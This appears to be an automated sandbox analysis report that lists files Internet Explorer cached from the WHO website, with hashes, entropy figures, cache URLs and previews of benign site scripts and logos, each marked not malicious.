                                                                                                                                                                    IE Cache URL:https://www.who.int/WebResource.axd?d=NjxTqR2bqTw1rewxxlkHPuVWylniiuH85dElS4-sTWByH4RE8E5E1AceaaoCFAJqZaJ0XO7-0paGWvgZTYHK6HfSMq7_7jIhS9QthTeHBDUU0pberHuOZvwLatBEXp3F8dWshLi8dFLqd-R5ePILXLxt9fP0bczWzQjlYINayIOpB5YnfTHc2ZyRpWOgtz7dNZw0Q5MPTr0UAPNLDUP5XStYynM1&t=637432980600000000
                                                                                                                                                                    Preview: .var PersonalizationTracker = null; !function () { "use strict"; PersonalizationTracker = { _canTrack: !1, _pageId: null, _url: !1, track: function (e) { if (PersonalizationTracker._canTrack = e, PersonalizationTracker._canTrack) { if (!PersonalizationTracker._readCookie("sf-prs-ss")) { var r = 1e4 * Date.now() + 621355968e9; PersonalizationTracker._createCookie("sf-prs-ss", r) } if (!PersonalizationTracker._readCookie("sf-prs-lu")) { var a = window.top || window; PersonalizationTracker._createCookie("sf-prs-lu", a.location.href) } PersonalizationTracker._pageId && PersonalizationTracker.trackPage(PersonalizationTracker._pageId), PersonalizationTracker._url && PersonalizationTracker.trackUrl() } else PersonalizationTracker._createCookie("sf-prs-ss", "", -1), PersonalizationTracker._createCookie("sf-prs-lu", "", -1), PersonalizationTracker._createCookie("sf-prs-vp", "", -1), PersonalizationTracker._createCookie("sf-prs-vu", "", -1) }, trackPage: function (e) { if (this._pageId = e.rep
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\YHCW2021_webbanner[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x476, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):104380
                                                                                                                                                                    Entropy (8bit):7.990167341345852
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:3072:TUa/BO+3IjWLORKYasxskndKOfq4TDW5eu/2K:TUYyjWLUdasxLHBCl
                                                                                                                                                                    MD5:B2C98CC3814C8816951F05A0A649040B
                                                                                                                                                                    SHA1:E4FE75EA77CEBBA9B54607EBE8E0F6C0633D0DE4
                                                                                                                                                                    SHA-256:DEED548FD3A02C88610065C39F1E40702D708E45D95016965CD6CB4D8F26EF5A
                                                                                                                                                                    SHA-512:E7BBAF218D322A7C31D423D1192C46B209258E1964176C51FA7F7009B005C5711FA37535D4D9D530F9FEE0EB65BF1CAB1A1D55539DB6D9CA74854F09C70AD96E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/annual-theme/year-of-health-and-care-workers-2021/yhcw2021_webbanner.tmb-1024v.jpg?Culture=en&sfvrsn=8bc1f524_3
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\YHCW2021_webbanner[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x357, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):65824
                                                                                                                                                                    Entropy (8bit):7.989331715764146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:jBdNSVJzAcAY1SPuyhw6FjIjd5lgNiCrKXpTirkkQuqjFZF:D4j8cAY1+tVIyN78li4Yqp
                                                                                                                                                                    MD5:FFE8B53F29C1EBCB3021D543302C4079
                                                                                                                                                                    SHA1:1A1D0EE69F9CBEF97B9038FD4CA9DFE7496051C1
                                                                                                                                                                    SHA-256:1CB5DF96B71EE2980ED3CA57502532DF7745E0845B7196560233B06F9BBFAB75
                                                                                                                                                                    SHA-512:D14CB0D611565F7815D8998328BBD6DFE83330DC0151EFA419DA9CD4518EECE6A960BA590FE31FD91116ED635E2DAA2038432F7417390DB339BDB71A21FF4134
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/annual-theme/year-of-health-and-care-workers-2021/yhcw2021_webbanner.tmb-768v.jpg?Culture=en&sfvrsn=8bc1f524_3
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clarity[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):46048
                                                                                                                                                                    Entropy (8bit):5.343769565964777
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:+lBiQfBiWFkKoB8LBdGAZzUHWIk3k8ccsyrT/W/l/Y:IeGkBWZlk8nv0A
                                                                                                                                                                    MD5:10EDE00503539D541E794D2392F1ACE3
                                                                                                                                                                    SHA1:BFBD044B3E3B351B0521FDE30BEC8F655649B681
                                                                                                                                                                    SHA-256:601ECEF6383D02E04903FDF3DD7CFDD968FB09973E39F74B583EB7B9773E8F0E
                                                                                                                                                                    SHA-512:CF17F75CC7467D6CB81269956AB0A731330DCC7E4FA929D08C55D12E234671195DBDC7A4B2F5C52D5D4063E099D25EBB39D5C3B837B80387AFF3F4B69E0DB2E6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.clarity.ms/eus2/s/0.6.10/clarity.js
                                                                                                                                                                    Preview: /* clarity-js v0.6.10: https://github.com/microsoft/clarity (License: MIT) */.!function(){"use strict";var t=Object.freeze({__proto__:null,get track(){return An},get start(){return Pn},get queue(){return Un},get stop(){return Bn}}),e={projectId:null,delay:3e3,cssRules:!1,lean:!0,track:!0,content:!0,mask:[],unmask:[],regions:{},metrics:{},cookies:[],report:null,upload:null,upgrade:null};function n(t,e,n,a){return new(n||(n=Promise))((function(r,i){function o(t){try{s(a.next(t))}catch(t){i(t)}}function u(t){try{s(a.throw(t))}catch(t){i(t)}}function s(t){var e;t.done?r(t.value):(e=t.value,e instanceof n?e:new n((function(t){t(e)}))).then(o,u)}s((a=a.apply(t,e||[])).next())}))}function a(t,e){var n,a,r,i,o={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function u(i){return function(u){return function(i){if(n)throw new TypeError("Generator is alre
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\content-block.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2258
                                                                                                                                                                    Entropy (8bit):4.815861912657056
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:x/BXA7n6y+zA+hsG1siIMRKMoNi15yqeTe6fNTyn8c:x66ysAwLHWeio8c
                                                                                                                                                                    MD5:E5B84AF688065EDE4F4B9D30C05BBE0C
                                                                                                                                                                    SHA1:E1C49051394CB36A5C5A81A960CECE54460FC4C8
                                                                                                                                                                    SHA-256:2E72A2EF97403F4E076E88CA1581CA566886FBEC347A44980B55CBD8298B8A0C
                                                                                                                                                                    SHA-512:D053867A290C40A4BB1C00C7F1E569EB96FA1C8E56CB4C68A4E4DA89CA3760686B70A927A9F4DC82C2C097ABD6F8AB5DAD66BDA66CCE16141247DD3330E0F676
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Mvc/Scripts/ContentBlock/content-block.min.js?package=WHO
                                                                                                                                                                    Preview: "use strict";!function(){for(var referenceNode,wrapper,imgContentBlockWrapper=document.querySelectorAll(".sf-content-block img"),i=0;i<imgContentBlockWrapper.length;i++){var img=imgContentBlockWrapper[i],imgWrapper=document.createElement("div");if(imgWrapper.setAttribute("class","img-wrapper"),null!==img.getAttribute("data-sf-show-caption")){var caption=img.getAttribute("data-sf-caption"),credit=img.getAttribute("data-sf-credit"),captionNew=img.getAttribute("data-sf-caption-text"),creditNew=img.getAttribute("data-sf-credit-text");if(null!==captionNew&&(caption=captionNew),null!==creditNew&&(credit=creditNew),null!==caption||null!==credit){var captionWrapper=document.createElement("div");captionWrapper.setAttribute("class","sf-image-credit"),imgWrapper.appendChild(captionWrapper);var captionWrapperContent=document.createElement("div");captionWrapperContent.setAttribute("class","sf-image-credit__content"),captionWrapper.appendChild(captionWrapperContent);var captionWrapperInner=document.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\event[1].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 565 x 569, 8-bit/color RGB, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):28900
                                                                                                                                                                    Entropy (8bit):7.8938708465480865
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:kNWicJeg+mnMfOlU7kuVawtxj2TAxKjDVFVMNdZg7a/bvkNwyJ4OLF16nswS2Sj4:cLcJeg+mMkgPjLKXnVMxgGbzr8WsUSk
                                                                                                                                                                    MD5:775DA22DEA03718AB38ECC378CB404B4
                                                                                                                                                                    SHA1:A1D495A26EAB71E84B3A74D310030E66BD815F31
                                                                                                                                                                    SHA-256:41DAF6E2DBFB1C0E5D8CC334628374ED2E3F1DBDFC8DB4A600135CD613A3460D
                                                                                                                                                                    SHA-512:3711FBEA2D3690C07CB38ABAE82F0BDCBB5ECFA58E9BE289B19CA7025D2FA9093280716D68BF705BE3812AC77C7F2AA260BBC773740BB7C28636E14CF80DB5D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/icons/media-centre/event.tmb-768v.png?Culture=en&sfvrsn=c073cbae_12
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\event[2].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 479 x 482, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):29228
                                                                                                                                                                    Entropy (8bit):7.911774994779232
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:zKvVpzhCM+T971aHyCdDGUAqy4toXjt/mOml1bS+3l:+v/hS1KdyUZRtIt/mvB3l
                                                                                                                                                                    MD5:61296AE34FEB1D1C9078D26DBBA716A9
                                                                                                                                                                    SHA1:75BE11485706D79F3615D61C3D2DF6C01C5DED6A
                                                                                                                                                                    SHA-256:BED887C2AFA59358CCF4E2669EE3A334278FDA24BE1EBA759C5B8C291E50A146
                                                                                                                                                                    SHA-512:AF9EF4D849C56EA2841CE10FA4B31418B82E4F55DF59C7D559D67AC1ADA35DEAE5CA87E3722B969CAF1C73EE76A4B5E7BA6100CAD9E477D712CACEEB9DC15F86
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/icons/media-centre/event.tmb-479v.png?Culture=en&sfvrsn=c073cbae_12
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\h-logo-blue[1].svg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):16220
                                                                                                                                                                    Entropy (8bit):4.2109186285257
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:i+y2TeDhgrpsd626Z76qvZq+4omAdY+nQc1y7bhfe2bUTCpKaFYbbPENQWL+XGda:4tSpsQ6qvH4odxQGy7bE6UTCkbzOQPXH
                                                                                                                                                                    MD5:25B83F51B93045685C1B1878D980004D
                                                                                                                                                                    SHA1:ACAF6AB0A5C1B89AB18370AA0D73EF9DF99EF00A
                                                                                                                                                                    SHA-256:907E8040278F2B7ADBCF0C5CB0158E768526C2FE3E0F21FD15F19EF5A3E7CA51
                                                                                                                                                                    SHA-512:8E71073F380DEDC06854B64B1390BD83ABACC6D85FADF4041A165156F0BA5EF625B2D6D944485474648F7041F75A2C0F45E725F20AF87558FF07C42E6250F5FE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/header-logos/h-logo-blue.svg?sfvrsn=aaed4f35_18
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-16"?>..<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 580.82 177.96">.. <defs>.. <style>.cls-1{fill:#0093d5;}</style>.. </defs>.. <title>World Health Organization</title>.. <g id="Layer_2">.. <g id="ENGLISH">.. <path class="cls-1" d="M164,32.58c3.86,4.6,10.61,7.31,14.56,11.92-2.83-13.63-13.35-24.76-25.79-27.42C158.84,21.65,160.15,28,164,32.58ZM14.48,67.13c8.57-18.65,21.36-14.7,26.77-32.47-3,5.45-17,7.75-23.51,21.72,3.31-8.3,1.65-21,7.25-27.85C8.25,40.88,15.38,60.86,14.48,67.13ZM30,111.86c1.54,7.26-3,17.74,4.2,27.76C26.76,131.28,11,129.16,4.58,116.48c8,31,29,24.6,38.39,31.33C35.21,136.66,41.56,129.25,30,111.86Zm-2.41,19.45C23,114,31.18,108,24.93,91.4c-.65,9.36-6.89,13.92-2.68,31C14.82,107.94,3.33,102.54,0,92.6.23,119.78,22.07,123.81,27.59,131.31Zm33.54,29c-6.43-8.9-2-13.93-20.1-30.09,3.82,5.9-.12,13.32,12.06,24.86-11.92-7-28.36-4-36.29-13.41C30.42,167.74,54.35,157.1,61.13,160.34Zm87.42-5.23c12.18-11.54,8.24-19,12.06-24.86-18.06,16.1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\h-logo-white[1].svg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):15877
                                                                                                                                                                    Entropy (8bit):4.141166902508873
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ttSpsQ6qvH4odxQGy7bE6UYCRhmYSboCf:izUbE6UY+EdUCf
                                                                                                                                                                    MD5:B22EA072DB23528D4D9E1394174839D1
                                                                                                                                                                    SHA1:BD017907D6EB3B8EFFA32F209483A29C2E243C45
                                                                                                                                                                    SHA-256:73E703721930186D3E47F7B259F032830D1C1ABF0AFF5555EB14E95B9F761E8E
                                                                                                                                                                    SHA-512:B04A71B8D6DAB9582A52C10F2DF8EB6E296446A7D31D948B2F0D2CD1D64B848B7507987E0C9EDD3265513EEDEB676ED95810545FEE8C3BF5E2C211EC3CAF2DEC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-white.svg
                                                                                                                                                                    Preview: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 580.82 177.96"><defs><style>.cls-1{fill:#fff;}</style></defs><title>World Health Organization</title><g id="Layer_2" data-name="Layer 2"><g id="ENGLISH"><path class="cls-1" d="M164,32.58c3.86,4.6,10.61,7.31,14.56,11.92-2.83-13.63-13.35-24.76-25.79-27.42C158.84,21.65,160.15,28,164,32.58ZM14.48,67.13c8.57-18.65,21.36-14.7,26.77-32.47-3,5.45-17,7.75-23.51,21.72,3.31-8.3,1.65-21,7.25-27.85C8.25,40.88,15.38,60.86,14.48,67.13ZM30,111.86c1.54,7.26-3,17.74,4.2,27.76C26.76,131.28,11,129.16,4.58,116.48c8,31,29,24.6,38.39,31.33C35.21,136.66,41.56,129.25,30,111.86Zm-2.41,19.45C23,114,31.18,108,24.93,91.4c-.65,9.36-6.89,13.92-2.68,31C14.82,107.94,3.33,102.54,0,92.6.23,119.78,22.07,123.81,27.59,131.31Zm33.54,29c-6.43-8.9-2-13.93-20.1-30.09,3.82,5.9-.12,13.32,12.06,24.86-11.92-7-28.36-4-36.29-13.41C30.42,167.74,54.35,157.1,61.13,160.34Zm87.42-5.23c12.18-11.54,8.24-19,12.06-24.86-18.06,16.16-13.67,21.19-20.1,30.09,6.78-3.24,30.71,7.4,44.32-18.64C176
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\image-resolution.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1923
                                                                                                                                                                    Entropy (8bit):5.227218785948522
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:IE5O53SFHIwi63TeaNWg1f5Vd15D55q5b56y55d5U5z55SRpY:TExniTeaN31Brdy1HpCNMHY
                                                                                                                                                                    MD5:051163E64CDC703A420B3DE2DFD2AD7A
                                                                                                                                                                    SHA1:2C1A1073D285462585F1576E975A684D42FCBD29
                                                                                                                                                                    SHA-256:4E69E8649EC29AA80A5FE79EA363A431A06E48E49C68C119F27F3DF2B1DA2FA4
                                                                                                                                                                    SHA-512:2AB4B77F60162C52F27953A9F8E770E3E22867CA82429CC761A18443705D5CBA5125AC04F4A1E77A0933C50D9D775FB3CE2AB425C9C1166A883FE2F0AFB6C7C3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/image-resolution.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";var imageResolution={imgResolution:function(){$(".thumb, .background-image").each(function(k,v){var imageRes,params,global,self,getThumnbSize;$(v),imageRes=$(".thumb, .background-image"),params={component:imageRes,resizeTimeout:250},global={window:$(window),resizeTimer:{},resize:"resize",dataAttribute:"data-image"},getThumnbSize=function(wWidth){for(var sizeMap=[{key:479,val:"479v"},{key:549,val:"549v"},{key:768,val:"768v"},{key:1024,val:"1024v"},{key:1366,val:"1366v"},{key:1920,val:"1920v"}],i=0;i<sizeMap.length;i++)if(wWidth<=sizeMap[i].key)return sizeMap[i].val;return"1366v"},(self={}).init=function(){self.initImage(),global.window.on(global.resize,function(e){clearTimeout(global.resizeTimer),global.resizeTimer=setTimeout(function(){self.initImage()},params.resizeTimeout)})},self.initImage=function(){params.component.each(function(){if($(this),$(this).hasClass("thumb")){if(""!==$(this).find("img").length){var globalAttr=$(this).find("img").attr(global.dataAttribute);if(
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\js[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):88446
                                                                                                                                                                    Entropy (8bit):5.499406721285165
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ohpMXbOlh0E+HGD+/HRE6cszpZvKZQf8PrmO+01W9nKPJZfdsFlGIAL5xKD26s:ohpMruh0g+5ssPf8Pl+hzAjss
                                                                                                                                                                    MD5:B5D853B0FAF805D5D8B8797869CB70E2
                                                                                                                                                                    SHA1:021A6880760BBF6AB739F92DA1D5C4774783A9DC
                                                                                                                                                                    SHA-256:725661F919AFE89C737ACFA3DDF897FBE71916532FDFE8FF9BF27B3F1264F359
                                                                                                                                                                    SHA-512:B8567D9EB03008F37A11E27BCA9219FC2E10A18CB15D546FAF2CD79E99AFC9FFA446BF74B75FA3E9206BA73A9ABBE291B17AEE720826E49A2E7B100E5F39EE0F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.google-analytics.com/gtm/js?id=GTM-P9P822R&t=gtm4&cid=134970160.1617289481
                                                                                                                                                                    Preview: .// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"2",. . "macros":[{. "function":"__e". },{. "function":"__dee". }],. "tags":[{. "function":"__asprv",. "vtp_globalName":"google_optimize",. "tag_id":6. }],. "predicates":[{. "function":"_eq",. "arg0":["macro",0],. "arg1":["macro",1]. },{. "function":"_eq",. "arg0":["macro",0],. "arg1":"optimize.callback". }],. "rules":[. [["if",0],["add",0]],. [["if",1],["add",0]]].},."runtime":[].....};../*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:ba(a)}},da="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},ea;.if("fu
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\language-selector.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                    Entropy (8bit):4.9940404581795566
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:TMQvLi6YMtFjKHIuRgQyBdd1XIC9HNKOCHPMLTEGAjOlG0/Yp8ktyIQuLL:A19yFGpnadpPlNKtH0LTEGAb5K5IQm
                                                                                                                                                                    MD5:D8CE6216FAD1B0598F9A8414847C3CF7
                                                                                                                                                                    SHA1:42540660D2C94184847FB21D91D4A962BC3C9153
                                                                                                                                                                    SHA-256:B98DB0B6820942BD68749A028A66D52157A27062968ED8791615A95C3E885210
                                                                                                                                                                    SHA-512:3156C08CCC64698F48799213F38AD030D5B23061305BA34AA88F8690219BC9BE3A70E3FEC36E9AF61BF098CE7DBC37F4869DB89EE65F508E6FC58C11CBEE7A77
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Frontend-Assembly/Telerik.Sitefinity.Frontend.Navigation/Mvc/Scripts/LanguageSelector/language-selector.min.js?package=WHO&v=MTMuMS43NDI5LjA%3d
                                                                                                                                                                    Preview: function openLink(o){var e=document.querySelector('[data-sf-role="'+o+'"]').value;window.location=e}.//# sourceMappingURL=language-selector.min.js.map
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\match-height.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3649
                                                                                                                                                                    Entropy (8bit):4.883208063188246
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:XQSj1yPQeVmFtLBeUdpcv5YOmHKUzl97xa0:g81aQeStLBdTcv5EHKUzj7xR
                                                                                                                                                                    MD5:109FF86BB1B43FB016103CC071EEB832
                                                                                                                                                                    SHA1:9A698F1BAC8C8609B22CD43C0B5674F6DAC072C3
                                                                                                                                                                    SHA-256:2389E480FCF94996A9755B92963D2E5F9A3AF2ECB0C27FFDA7B1D8BD0CAFE935
                                                                                                                                                                    SHA-512:2A6C8FA1C9DF7004DCDA06D2D94D26FF1C99BA7D535B20FBBA6D1BE820F13D6A6FF4DA604062A7B41CD9EEB5549D42C8FA3D72E40621C1CB1F0EADAD8AB989F6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/match-height.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: .!function (t) { var e = -1, a = -1, o = function (t) { return parseFloat(t) || 0 }, n = function (e) { var a = null, n = []; return t(e).each(function () { var e = t(this), i = e.offset().top - o(e.css("margin-top")), r = n.length > 0 ? n[n.length - 1] : null; null === r ? n.push(e) : Math.floor(Math.abs(a - i)) <= 1 ? n[n.length - 1] = r.add(e) : n.push(e), a = i }), n }, i = function (e) { var a = { byRow: !0, property: "height", target: null, remove: !1 }; return "object" == typeof e ? t.extend(a, e) : ("boolean" == typeof e ? a.byRow = e : "remove" === e && (a.remove = !0), a) }, r = t.fn.matchHeight = function (e) { var a = i(e); if (a.remove) { var o = this; return this.css(a.property, ""), t.each(r._groups, function (t, e) { e.elements = e.elements.not(o) }), this } return this.length <= 1 && !a.target ? this : (r._groups.push({ elements: this, options: a }), r._apply(this, a), this) }; r.version = "master", r._groups = [], r._throttle = 80, r._maintainScroll = !1, r._beforeU
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\publications-hero-image-thumb[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x441, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):38392
                                                                                                                                                                    Entropy (8bit):7.951700578169718
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:l/TLn9QGkGl1I+UmZ0D4llKp0F1uNjNzId6G4sWfqPKsXJjXhnI8vxX:hTL91T64jKp21mmd6pfFsBhnI8JX
                                                                                                                                                                    MD5:1C9296DCD7A3E3822924710F5F96EF16
                                                                                                                                                                    SHA1:CCD25B51EE6E9A4403C9261D26BFBFCCCCB03290
                                                                                                                                                                    SHA-256:1B0FA6BBC554CBE1F0B0130648B481B27295BBF755EE26D4D3DAA2BCAFE1E1EE
                                                                                                                                                                    SHA-512:335AF37D6108E741B6EE52055727412840765F696A9975C9D35AC8CB92B43D3C6FD8A9210DB68721943DDBFB5EBCEFA6909731385197B785E77DC166EC9C6118
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/publications/publications-hero-image-thumb.tmb-768v.jpg?sfvrsn=8174ac48_1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\responsive-background-image.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):517
                                                                                                                                                                    Entropy (8bit):4.923514288470868
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:1ZA81QYAGdMfHeGX3GHTVgVQGQoAJgNYGBhExG0sxC5SweXS:1Zn1Q4Mf+GX3ayQpguZG1xC5SweXS
                                                                                                                                                                    MD5:CA549D40B7866A9C6FB4F49E58A091F3
                                                                                                                                                                    SHA1:67E8DE2030EB6B9065AF58A1493B56E800E8AE76
                                                                                                                                                                    SHA-256:B043D6283BE5CD264DB0040CE974B2256014D969C224B0730E004E5D0847BEDB
                                                                                                                                                                    SHA-512:651DAA3DC665955002BF234B3C5496192ECFF6FB22FABBE1BFACE7265F931781195016545577D1607A99EDBD0C28CDDF02BE58D2214B35BB5DC22A297A2657F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Mvc/Scripts/HeroImage/responsive-background-image.min.js?package=WHO
                                                                                                                                                                    Preview: "use strict";!function(){for(var responsiveBackgroundImage=function(element){var img=element.querySelector("img");img.addEventListener("load",function(){update(img,"",element)}),img.complete&&update(img,"",element)},update=function(img,src,element){var newSrc=void 0!==img.currentSrc?img.currentSrc:img.src;src!==newSrc&&(src=newSrc,element.style.backgroundImage='url("'+src+'")')},elements=document.querySelectorAll(".responsive-background-image"),i=0;i<elements.length;i++)responsiveBackgroundImage(elements[i])}();
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\slicknav.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):8420
                                                                                                                                                                    Entropy (8bit):5.177988984394695
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:e6B5ftaVYApggJKmapO684YBtzcmJycbeKkiKk4rB0KGtZYqxq3FWMrutqGcVtVm:rBt6YAUmW8PFMeRQR1Un1q3Ikuty7dW
                                                                                                                                                                    MD5:745444B5CE44F38EB1E80DBF902ABB83
                                                                                                                                                                    SHA1:922B44F66DFAC9814F931118C3323FE30E27BB1B
                                                                                                                                                                    SHA-256:1FD1E7C1F102C491FCBCBE53ECA8601DF80663B293B8EF8D8683B9DA0D3587E1
                                                                                                                                                                    SHA-512:9D79989A8B351B0C994283836E5711AA344067AF51A175855506456C72AB22D85F7E4C5A4F78FBC12C7C7865B13BA269E47D0ED94E93A783456E493162F13D08
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/slicknav.min.js?v=12.1.7126.28741
